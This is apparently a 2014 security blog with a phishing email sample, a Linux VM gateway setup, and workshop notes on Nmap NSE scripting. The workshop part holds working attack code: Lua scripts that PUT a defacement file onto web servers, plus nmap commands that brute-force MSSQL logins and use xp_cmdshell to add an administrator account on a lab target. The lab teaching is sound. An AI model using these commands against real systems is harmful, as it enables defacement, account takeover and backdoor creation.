Wednesday, May 14, 2014

New-Phishing

Here comes new phishing email 

Good Morning

I hope you slept well. i uploaded some documents via Google drive for your review.


Regards

--

Rosmawani Binti Hj Mohd Salleh | Manager

Corporate Finance Department
Credit Management Unit 

Telekom Brunei Berhad

TelBru Brunei Berhad Headquarters, Unit 1.01, Block D,
Yayasan Sultan Haji Hassanal Bolkiah Complex
Jalan Pretty | Bandar Seri Begawan BS8711, Negara Brunei Darussalam





The address is interesting Its huge so putting it here in pastebin http://pastebin.com/Z0vhfzd4

Be aware Be safe.

Whois




Friday, March 28, 2014

Vmware Player-Guest as internet gateway

Recently one of my friend asked me about setting up a Internet gateway on Virtual Guest system and configure that for other virtual machines and Host to connect internet.

The following steps used to test this successfully.

Details of the setup

Systms used all are Linux.

ppp0 -> Internet connection using USB dongle.
Eth0 -> Interface used by default with vmware player.

IP Details
ppp0 -> DHCP by ISP.
eth0 -> 192.168.2.140/24


The following lines can be saved in /etc/rc.local   permanently.

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i eth0 -j ACCEPT
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE

All done. This machine become Linux router.

Setup for other virtual guest.
Command line
ifconfig eth0 192.168.2.130/24
route add default gw 192.168.2.140


GUI


On HOST System

Add route
sudo route add default gw 192.168.2.140 vmnet8
add DNS server IP inside /etc/resolv.conf
nameserver 8.8.8.8

IP is already there on vmnet0.

After setting up route. The gateway guest system may loose IP address. Just set the ip address with following command
ifconfig eth0 192.168.2.140/24








Sunday, February 2, 2014

NULL-HUMLA-NMAP-NSE-NetworkPentesting

This is about the NULL Humla happened about NMAP NSE Scripting - by Sudhir Babu & Rupam Bhattacharya at Bangalore Center for Internet and Society.

Agenda:

1. Getting familiar with usage of nmap scripting
2. Go inside and see the script source and understand fundamental structure 
3. Write your own script and execute the same with nmap against target machine
4. Getting a shell on target using default scripts on a vulnerable system.

Pre-requisite : Two Systems 
                      1. Any system running with latest version of nmap
                      2. Target vulnerable system  (Windows XP with SQL Server was provided)

Getting familiar with NMAP
http://www.nmap.org 

Location of script files on Linux system




How to run scripts 

#nmap -p80 -PN -n 192.168.2.128 --script=http-date

The following description is available in the description part of script

"This script will scan port 80 and if its open it will check the date. Gets the date from HTTP-like services. Also prints how much the date differs from local time. Local time is the time the HTTP request was sent, so the difference includes at least the duration of one RTT."

Script Structure 

The following is a script to retrieve the day and time from the day-time server 

local comm = require "comm"
local shortport = require "shortport"

description = [[
Retrieves the day and time from the Daytime service.
]]

---
-- @output
-- PORT   STATE SERVICE
-- 13/tcp open  daytime
-- |_daytime: Wed Mar 31 14:48:58 MDT 2010

author = "Diman Todorov"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"discovery", "safe"}


portrule = shortport.port_or_service(13, "daytime", {"tcp", "udp"})

action = function(host, port)
        local status, result = comm.exchange(host, port, "dummy", {lines=1, proto=port.protocol})

        if status then
                return result
        end
end

Elaborated details are already available here -> http://nmap.org/book/nse-script-format.html

Following script will get list of http methods enabled on a web server

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.generic_request(host,port,"OPTIONS","/")
return response
end

In this the description, author and licence sections are optional in case of personal use.

This will open connection to the port of web server and send OPTIONS and get the response and return the response to the NMAP engine. NMAP engine will display the result as shown below. We can see NMAP showing the script name and below the output. It allows GET HEAD POST and OPTIONS



Another example against a web server allows other dangerous OPTIONS like DELETE, PUT,MOVE, etc.



How to put a file to the web server using NSE Script.

Method one using PUT. 

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.put(host,port,"/deface.txt",nil,"defacingweb")
return response
end


TO DELETE an uploaded file
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.generic_request(host,port,"DELETE","/deface.txt",nil)
return response
end

SOCKET

Create a file using NSE Socket

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

categories = {"default"}

portrule = shortport.http

local socket = nmap.new_socket()

action = function(host,port)
        socket:connect(host,port)
        socket:send("PUT /deface.txt HTTP/1.1 \r\nHost: 192.168.0.5\r\nContent-length: 6\r\n\r\ndeface")
        response=socket:receive()
        return response
end


Other default NSE script example

SQL username/password brute-forcing
 #nmap -p 1433 --script ms-sql-brute --script-args userdb=username.txt ,passdb=password.txt 192.168.0.5

SQL CMD SHELL add a user
 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net user admin1 admin1-password /add" 192.168.0.5

Add the user to Administrators group(net localgroup administrators <username> /add)

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net localgroup administrators admin1 /add" 192.168.0.5

Run other commands example "ipconfig"
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.0.5



Thanks to NULL++ Sudhir Babu ++ Rupam Bhattacharya & Riyaz Walikar ++ Akash Mahajan